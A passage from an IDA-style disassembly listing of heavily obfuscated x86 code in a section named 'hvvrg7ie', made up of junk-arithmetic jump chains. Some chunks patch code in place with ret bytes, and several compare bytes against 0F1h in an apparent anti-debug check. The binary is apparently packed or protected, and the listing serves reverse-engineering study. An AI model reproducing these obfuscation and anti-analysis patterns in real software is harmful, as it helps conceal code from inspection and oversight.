; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D247

loc_44B898:				; CODE XREF: hvvrg7ie:00450AC1j
					; sub_43D247+19855j
		sub	ebp, edi
		mov	ecx, 2EE14BE6h
		jmp	loc_4459C3
; END OF FUNCTION CHUNK	FOR sub_43D247

; =============== S U B	R O U T	I N E =======================================



sub_44B8A4	proc near		; DATA XREF: sub_45A0B1-14388o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D5B6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C23C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC4D SIZE 00000005 BYTES

		push	eax
		push	0D2BCCDC4h
		pop	eax
		add	eax, 5AF68837h
		sub	eax, 0D2139DE5h
		jmp	loc_44C23C
sub_44B8A4	endp

; ---------------------------------------------------------------------------
		mov	ebx, [edx]
		jmp	loc_44861A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_317. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44B8C4:				; CODE XREF: sub_43C811+19EB7j
		jmp	loc_4446C9
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_44B8C9:				; CODE XREF: sub_44934B+5FDj
		jmp	loc_44566A
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44048E

loc_44B8CE:				; CODE XREF: sub_44048E+11955j
		push	766A8000h
		pop	ebx
		rol	ebx, 8
		add	ebx, 4041F870h
		add	eax, ebx
		call	sub_445934
		mov	ds:dword_41D0D8, eax
		lea	eax, nullsub_3
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_3
; END OF FUNCTION CHUNK	FOR sub_44048E
; ---------------------------------------------------------------------------

loc_44B8F8:				; CODE XREF: hvvrg7ie:0043C1F0j
		mov	eax, [esp]
		push	ecx
		push	edx
		rol	ecx, 2
		jmp	loc_4493E4
; ---------------------------------------------------------------------------

loc_44B905:				; DATA XREF: sub_44D8CE-19FCo
		mov	ds:dword_451E64, eax
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_44B90B:				; CODE XREF: sub_44B3F1-78A9j
					; sub_4544DD:loc_4590D5j
		sub	eax, 9C3D92C9h
		push	edi
		push	5F5B2629h
		pop	edi
		rol	edi, 1
		or	edi, ds:4000F2h
		add	edi, 0A70EA5B9h
		jmp	loc_44E039
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------

loc_44B92B:				; CODE XREF: hvvrg7ie:0044378Bj
		jz	loc_4559FD
		jmp	loc_439C86
; ---------------------------------------------------------------------------
		call	nullsub_330
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_44B93E:				; CODE XREF: hvvrg7ie:004519E9j
		push	ebx
		jmp	loc_44257A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44B944:				; CODE XREF: sub_4465A6:loc_446884j
		mov	ds:off_41D098, eax
		lea	eax, loc_43BA1D
		mov	byte ptr [eax],	0C3h
		jmp	loc_43BA1D
; ---------------------------------------------------------------------------

loc_44B958:				; CODE XREF: sub_4465A6-AB83j
		mov	eax, [esp+0]
		jmp	loc_4467BE
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_44B960:				; CODE XREF: sub_43C354+1B3ACj
		jz	loc_43B0E5
		jmp	loc_43D2E3
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------

loc_44B96B:				; CODE XREF: hvvrg7ie:0043DB47j
		jnb	loc_44B567
		and	eax, 5359E32h
		cdq
		adc	edi, 76C81389h
		mov	edi, [eax]
		jmp	loc_44B561
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_44B985:				; CODE XREF: sub_44B1C6+8j
		jnz	loc_43B43F
		jmp	loc_456C11
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------

loc_44B990:				; CODE XREF: hvvrg7ie:0043AC36j
		add	ebp, edi
		shr	edx, 2
		jo	loc_4500F5
		sub	ecx, edx
; START	OF FUNCTION CHUNK FOR sub_450810

loc_44B99D:				; CODE XREF: sub_450810:loc_43AC25j
		and	eax, 1D2BB904h
		xor	eax, 607096F7h
		or	eax, 14068288h
		jmp	loc_458050
; END OF FUNCTION CHUNK	FOR sub_450810

; =============== S U B	R O U T	I N E =======================================



sub_44B9B4	proc near		; DATA XREF: hvvrg7ie:00449BE9o
		mov	edx, 64EFA9EDh
		push	ebx
		push	0E53302B5h
		pop	ebx
		and	ebx, ds:4000F3h
		sub	ebx, 289DB1C8h

loc_44B9CC:				; CODE XREF: hvvrg7ie:0043CCE1j
		call	sub_442E42
sub_44B9B4	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_446581

loc_44B9D1:				; CODE XREF: sub_446581+20j
		jmp	loc_448311
; END OF FUNCTION CHUNK	FOR sub_446581
; ---------------------------------------------------------------------------
		xor	ebx, edi
		jmp	loc_451D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_44B9DD:				; CODE XREF: sub_439B29+D20Ej
		jo	sub_450434
		test	ebx, ecx
		jmp	loc_459C6A
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44B9EA:				; CODE XREF: sub_450434:loc_43ED31j
		add	eax, 0D0951E07h
		add	eax, ebp
		add	eax, 0ED9CDA06h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_441257
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_44BA02:				; CODE XREF: hvvrg7ie:loc_45AD53j
		and	ecx, eax
		adc	eax, 0F9296746h
		mov	[ecx], edx
		pushf
		xchg	esi, ebp
		jmp	loc_43FE8B
; ---------------------------------------------------------------------------
		mov	ecx, esi
		jmp	sub_43AF96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_44BA1B:				; CODE XREF: hvvrg7ie:0043D399j
					; sub_440402:loc_44A5AAj
		add	eax, [ebp-4]
		mov	[ebp-14h], eax
		mov	eax, [ebp-14h]
		mov	eax, [eax+18h]
		dec	eax
		test	eax, eax
		jl	loc_440EF1
		jmp	loc_459B71
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44BA35:				; CODE XREF: sub_43B6A5+11E0Dj
		add	ebx, 64B52E2Fh
		add	eax, ebx
		pop	ebx
		push	offset loc_445821
		jmp	nullsub_391
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D3B5

loc_44BA48:				; CODE XREF: sub_43D3B5:loc_43B763j
		jge	loc_454116
		rol	ecx, 14h
		cmp	ebp, 49A44C05h
		jmp	loc_45410E
; END OF FUNCTION CHUNK	FOR sub_43D3B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438FA

loc_44BA5C:				; CODE XREF: sub_4438FA+25FAj
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		mov	[edx-10h], eax
		inc	dword ptr [ebp-4]
		mov	eax, [ebp+8]
		mov	eax, [eax-10h]
		push	offset loc_446495
		jmp	loc_4474E2
; END OF FUNCTION CHUNK	FOR sub_4438FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D149

loc_44BA78:				; CODE XREF: sub_44D149+Bj
		jz	loc_4520C2
		jmp	loc_444392
; END OF FUNCTION CHUNK	FOR sub_44D149
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4CA

loc_44BA83:				; CODE XREF: sub_44B4CA:loc_43BF19j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_507
; END OF FUNCTION CHUNK	FOR sub_44B4CA
; ---------------------------------------------------------------------------

loc_44BA8B:				; CODE XREF: hvvrg7ie:00440770j
		mov	eax, [esp]
		push	edx
		push	eax
		push	838ABA3Fh
		push	offset sub_456676
		jmp	locret_44C871
; ---------------------------------------------------------------------------
		adc	eax, edi
		jmp	sub_4430E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B3FF

loc_44BAA6:				; CODE XREF: sub_45B3FF:loc_44DE9Cj
		call	sub_43AAE4
; END OF FUNCTION CHUNK	FOR sub_45B3FF
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44BAAB:				; CODE XREF: sub_454099+5706j
		jmp	loc_441455
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44BAB0:				; CODE XREF: sub_440643+7466j
		jmp	loc_45686D
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------

loc_44BAB5:				; CODE XREF: hvvrg7ie:0043CED4j
		jnz	loc_456324
		jmp	loc_43D5E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_44BAC0:				; CODE XREF: sub_456A52-10EF5j
		add	ebx, eax
		jmp	loc_455802
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_44BAC7:				; CODE XREF: hvvrg7ie:0043EA65j
		xchg	edx, [esp]
		pop	edx
		xchg	esi, [esp]
		mov	edx, esi
		jmp	loc_45B594
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44BAD6:				; CODE XREF: hvvrg7ie:0045A471j
		jmp	locret_44C194
; ---------------------------------------------------------------------------

loc_44BADB:				; CODE XREF: hvvrg7ie:00453A04j
		jmp	loc_4528F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_44BAE0:				; CODE XREF: sub_446D8D+1409Ej
		add	esi, 0C9D50BD1h
		mov	[esi], eax
		push	offset sub_44321C
		jmp	nullsub_443
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C290

loc_44BAF2:				; CODE XREF: sub_43C290+6261j
					; hvvrg7ie:loc_458275j	...
		call	sub_4491A7

loc_44BAF7:				; CODE XREF: hvvrg7ie:0045459Ej
		and	esi, 6DC33963h
		pushf

loc_44BAFE:				; CODE XREF: sub_4547E8+10j
		xor	edx, 0BB90FCA1h
		add	edx, 7D2D20F2h
		xchg	edx, [esp+4+var_4]
		jmp	loc_454CE5
; END OF FUNCTION CHUNK	FOR sub_43C290
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_44BB12:				; CODE XREF: sub_44C8FB-1380Fj
		add	ebx, 723862DFh
		pop	ebp
		xor	esi, 6C9BB78h
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_44BB1F:				; CODE XREF: sub_4569C6:loc_43C6D2j
					; sub_44C8FB:loc_43DE8Cj ...
		jmp	loc_440B6E
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569C6

loc_44BB24:				; CODE XREF: sub_4569C6-9399j
					; sub_44C8FB+A228j
		pop	ecx
		xchg	ecx, [esp+0]
		jmp	loc_452C11
; END OF FUNCTION CHUNK	FOR sub_4569C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B163

loc_44BB2D:				; CODE XREF: sub_45B163+6j
		pop	ebx
		or	ebx, 4E3C6314h
		rol	ebx, 1Ch
		sub	ebx, 0DCB4636Ch
		xor	ebx, 7FCDA156h
		add	eax, ebx
		pop	ebx
		jmp	loc_44A96E
; END OF FUNCTION CHUNK	FOR sub_45B163
; ---------------------------------------------------------------------------

loc_44BB4B:				; CODE XREF: hvvrg7ie:0043BD42j
		xor	ebx, 3F3E7749h

; =============== S U B	R O U T	I N E =======================================



sub_44BB51	proc near		; CODE XREF: sub_439873+B9B8p
		xchg	edi, [esp+0]
		pop	edi
		call	sub_441E44
		jmp	loc_43C3D7
sub_44BB51	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		pop	ecx
		jmp	loc_4498F9
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		ror	eax, 10h
		mov	ds:dword_448D1C, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A994

loc_44BB75:				; CODE XREF: sub_44A994+12j
		jmp	nullsub_91
; END OF FUNCTION CHUNK	FOR sub_44A994
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_44BB7A:				; CODE XREF: hvvrg7ie:00445EBCj
					; sub_43DB4C+1D6E8j
		rol	eax, 10h
		jmp	loc_45B5BF
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; ---------------------------------------------------------------------------
		mov	eax, 0EA34346Fh
		call	sub_444E8E
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44BB8C:				; CODE XREF: sub_44D2F8-11837j
		jmp	loc_457D48
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_44BB91:				; DATA XREF: sub_446EC2:loc_44602Fo
		cmp	byte ptr [eax],	0F1h
		jnz	loc_457696
		jmp	loc_45B4EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44BB9F:				; CODE XREF: sub_43D285:loc_4439C6j
		push	299813A3h
		pop	esi
		and	esi, 599351FDh
		sub	esi, ds:4000FAh
		jmp	loc_454A86
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_44BBB6:				; CODE XREF: sub_44BCAE:loc_444562j
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_455749
		jmp	loc_45B630
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44440B

loc_44BBC6:				; CODE XREF: sub_44440B:loc_43C93Ej
		call	sub_43BDCF

loc_44BBCB:				; CODE XREF: sub_452F0E+450Fj
		jmp	loc_43E3D9
; END OF FUNCTION CHUNK	FOR sub_44440B
; ---------------------------------------------------------------------------

loc_44BBD0:				; CODE XREF: hvvrg7ie:0045B30Ej
		xchg	eax, [esp]
		push	offset loc_447268
		jmp	loc_4557B4
; ---------------------------------------------------------------------------

loc_44BBDD:				; DATA XREF: sub_44BCAE-B4E8o
		ror	eax, 5
		push	ebx
		push	80C06BD8h
		pop	ebx
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44BBE7:				; CODE XREF: sub_450AA8:loc_44A8E9j
		rol	ebx, 7
		or	ebx, 85F112C3h
		jmp	loc_44E081
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44BBF5:				; CODE XREF: sub_445CCD:loc_443297j
		jl	loc_45ACBE

loc_44BBFB:				; CODE XREF: hvvrg7ie:0043CF88j
		jmp	nullsub_143
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		jz	loc_453B20
		rol	esi, 3
		jmp	loc_45ACBC

; =============== S U B	R O U T	I N E =======================================



sub_44BC0E	proc near		; CODE XREF: sub_4465A6+5D1Bp
					; sub_44D798+Dj
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_6
sub_44BC0E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44BC1A:				; CODE XREF: hvvrg7ie:00445924j
		mov	eax, [esp]
		push	edx
		call	sub_45329F
		jmp	loc_45632B
; ---------------------------------------------------------------------------

loc_44BC28:				; DATA XREF: sub_447E56-32D9o
		xchg	eax, [esp]
		call	sub_44F7CF
		mov	eax, 3195933h
		call	sub_458A13
		mov	ds:off_41D204, eax
		lea	eax, loc_444B70
		mov	byte ptr [eax],	0C3h
		jmp	loc_444B70
; ---------------------------------------------------------------------------
		mov	ds:dword_4578C0, eax
		call	sub_44D2C6
		dec	eax
		mov	edx, ds:dword_4578C0
		jmp	loc_45779C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44BC64:				; CODE XREF: sub_45889B-42B0j
		jl	loc_44EC36

loc_44BC6A:				; CODE XREF: sub_445F72:loc_4542F0j
		and	ebx, 780DE54Eh
		sub	ebx, 3D3F6823h
		test	ebx, 800000h
		jmp	loc_45401F
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_44BC81:				; CODE XREF: sub_45196D-F38Ej
					; sub_45196D-F382j
		or	esi, 0FD052411h
		add	esi, 29E38BDh
		xchg	esi, [esp-4+arg_0]
		jmp	loc_442DE9
; END OF FUNCTION CHUNK	FOR sub_45196D
; ---------------------------------------------------------------------------
		xchg	ecx, ebp
		jmp	sub_43A088
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD	"+" TO EXPAND]
		db 7Ch,	2Bh, 0A0h
dword_44BCA0	dd 9D37399Ah		; DATA XREF: sub_43D980+4w
					; hvvrg7ie:loc_44377Dr
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_44BCA4:				; CODE XREF: sub_44BCAE+Bj
		jmp	nullsub_92
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44BCA9:				; CODE XREF: sub_44388C-C7j
		jmp	loc_442A4B
; END OF FUNCTION CHUNK	FOR sub_44388C

; =============== S U B	R O U T	I N E =======================================



sub_44BCAE	proc near		; CODE XREF: sub_4176BD+31p
					; DATA XREF: _1fieagrn:off_41D008o

; FUNCTION CHUNK AT 0043BBA8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D0CB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DC57 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043DD12 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E34D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E9A6 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043F4AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F6C3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004407BA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440CF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440D58 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044210F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442D91 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444557 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004449C4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00445A98 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004470DB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447A3C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BBB6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BCA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C101 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C453 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044CFB6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00455433 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045595D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004571FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458A1E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00459FCB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B3B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B630 SIZE 00000005 BYTES

		jns	loc_44C453
		push	offset loc_439F96
		jmp	loc_44BCA4
sub_44BCAE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44BCBE:				; CODE XREF: hvvrg7ie:0044ECC0j
		pushf
		push	3CBAFC18h
		pop	ecx
		xor	ecx, 0FDCE8DF8h
		or	ecx, ds:4000F0h
		sub	ecx, 0CA48CA34h
		jmp	loc_451D02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_44BCDC:				; CODE XREF: sub_4403B6+7B96j
		sbb	ebx, 22719015h
		not	ecx
		xor	edi, 0E42B8D78h
		sbb	ebp, 0EE372F37h

loc_44BCF0:				; CODE XREF: sub_43D285:loc_44D133j
		call	sub_45AD2D
; END OF FUNCTION CHUNK	FOR sub_4403B6
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_44BCF5:				; CODE XREF: sub_44C6BE+14j
		rol	esi, 0Fh
		xor	esi, 96C697A6h
		xchg	esi, [esp-4+arg_0]
		push	10h
		mov	eax, [ebp-8]
		push	eax
		jmp	loc_444CFE
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_461. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44BD0D:				; CODE XREF: hvvrg7ie:0045934Dj
					; hvvrg7ie:loc_45ADDAj
		jp	loc_44A6E0

; =============== S U B	R O U T	I N E =======================================



sub_44BD13	proc near		; CODE XREF: hvvrg7ie:0043EEAFp
		xchg	ecx, [esp+0]
		pop	ecx
		call	nullsub_529
sub_44BD13	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44BD1C:				; CODE XREF: sub_45889B:loc_450678j
		mov	eax, [ebp-4]
		cmp	dword ptr [eax+4], 0
		ja	loc_44FAC3
		jmp	loc_453090
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_44BD2E:				; CODE XREF: sub_449425:loc_45B13Bj
		xchg	ebx, [eax]
		sub	eax, 7BF0845Ah
		jmp	loc_448C2A
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		pop	edx
		rol	edx, 1Ah
		test	edx, 80h
		jmp	loc_4525A9
; ---------------------------------------------------------------------------

loc_44BD4A:				; CODE XREF: hvvrg7ie:0043C7C9j
		add	ebp, esi
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_44BD4C:				; CODE XREF: sub_43F98C:loc_442D7Fj
		add	eax, 28DD9190h

loc_44BD52:				; CODE XREF: hvvrg7ie:0044E64Fj
		call	sub_44CCA7
; END OF FUNCTION CHUNK	FOR sub_43F98C
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_44BD57:				; CODE XREF: sub_44370F-1287j
		jmp	loc_44B7A9
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------

loc_44BD5C:				; CODE XREF: hvvrg7ie:0043CFC5j
		jmp	loc_451A75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8AB

loc_44BD61:				; CODE XREF: sub_43F8AB+141A2j
		add	ebp, edi
		jmp	loc_44FDAC
; END OF FUNCTION CHUNK	FOR sub_43F8AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44BD68:				; CODE XREF: sub_43E128+199EBj
		jz	loc_4563FC

loc_44BD6E:				; CODE XREF: sub_43E128:loc_456F8Ej
		cmp	dword ptr [ebp-108h], 436E6F4Dh
		jnz	loc_44D054
		jmp	loc_45A90C
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44BD83:				; CODE XREF: sub_44191F:loc_447301j
		sbb	eax, 0F58A3689h
		jmp	loc_44970D
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449885

loc_44BD8E:				; CODE XREF: sub_449885:loc_45188Ej
		pop	ebx
		lea	eax, loc_459918
		mov	byte ptr [eax],	0C3h
		jmp	loc_459918
; END OF FUNCTION CHUNK	FOR sub_449885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_44BD9D:				; CODE XREF: sub_44E533:loc_459918j
		pop	edx
		mov	eax, [esp+0]
		push	edx
		jmp	sub_4398FA
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
		mov	edx, 0F7C6D0F8h
		push	eax
		push	4C6263C6h
		pop	eax
		jmp	loc_459A72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_44BDB8:				; CODE XREF: sub_443375-914Dj
		jz	loc_4441A8
		jmp	loc_451267
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
		sub	esi, ebp
		jmp	sub_44722C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44BDCA:				; CODE XREF: sub_45541B-7E5Cj
					; hvvrg7ie:0044D5CDj
		push	offset sub_4498DE
		jmp	loc_44788C
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
		pop	eax
		jmp	loc_4531AF
; ---------------------------------------------------------------------------

loc_44BDDA:				; CODE XREF: hvvrg7ie:00446DF0j
		jl	loc_4591C7

loc_44BDE0:				; CODE XREF: hvvrg7ie:loc_443ED2j
		sub	eax, 42249B2Ch
		jb	loc_458549
		ja	loc_43D95C
		jmp	loc_4588D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B13

loc_44BDF7:				; CODE XREF: sub_440B13:loc_447257j
		pop	ecx
		xor	ecx, 0DF987026h
		jns	loc_45998D
		add	ebx, 6FB416E5h
		jmp	loc_4478B8
; END OF FUNCTION CHUNK	FOR sub_440B13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44BE0F:				; CODE XREF: sub_44191F-207Fj
		jb	loc_44B0E2
		cmp	ebp, 118B90DEh
		jmp	loc_43E8A3
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		mov	eax, 934299CDh
		call	sub_450C5A
		mov	ds:dword_41D0F0, eax
		call	sub_43D622
; START	OF FUNCTION CHUNK FOR sub_43B624

loc_44BE35:				; CODE XREF: sub_43B624+1086Aj
		jmp	loc_44C5B1
; END OF FUNCTION CHUNK	FOR sub_43B624
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429CE

loc_44BE3A:				; CODE XREF: sub_4429CE+4B77j
		add	eax, 509C5685h

loc_44BE40:				; CODE XREF: hvvrg7ie:00448F36j
		push	ecx
		push	35BC9516h
		pop	ecx
		sub	ecx, 55301420h
		jmp	loc_45A9FB
; END OF FUNCTION CHUNK	FOR sub_4429CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44BE52:				; CODE XREF: sub_44D2F8-141AEj
		or	ebp, esi
		not	ecx
		shl	esi, 1Ch
		jmp	loc_44A510
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		sub	ecx, edi
		ror	ebx, 1Fh
		jmp	sub_44A4D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B624

loc_44BE68:				; CODE XREF: sub_43B624+11j
		and	eax, ds:4000F0h
		add	eax, 0B5937284h
		xor	eax, 0A5312A05h
		and	eax, ds:4000F0h
		add	eax, 0DA07A015h
		call	sub_458A13
		push	ecx
		mov	ecx, esi
		jmp	loc_44BE35
; END OF FUNCTION CHUNK	FOR sub_43B624
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447084

loc_44BE93:				; CODE XREF: sub_447084:loc_44C7AAj
		add	eax, 54E23B81h
		or	eax, 248F0C54h
		add	eax, 87EE7A9Ch
		call	sub_450C5A
		mov	ds:off_41D1AC, eax
		lea	eax, loc_454604
		jmp	loc_44964E
; END OF FUNCTION CHUNK	FOR sub_447084

; =============== S U B	R O U T	I N E =======================================



sub_44BEBB	proc near		; CODE XREF: hvvrg7ie:loc_44AC19j
					; sub_43E063+1D557p

; FUNCTION CHUNK AT 0043A22D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043B475 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043C92B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043CE43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D9CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FDA7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00446061 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004461C2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446CA9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447442 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004476E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448AF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A789 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B7E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA2B SIZE 0000001B BYTES
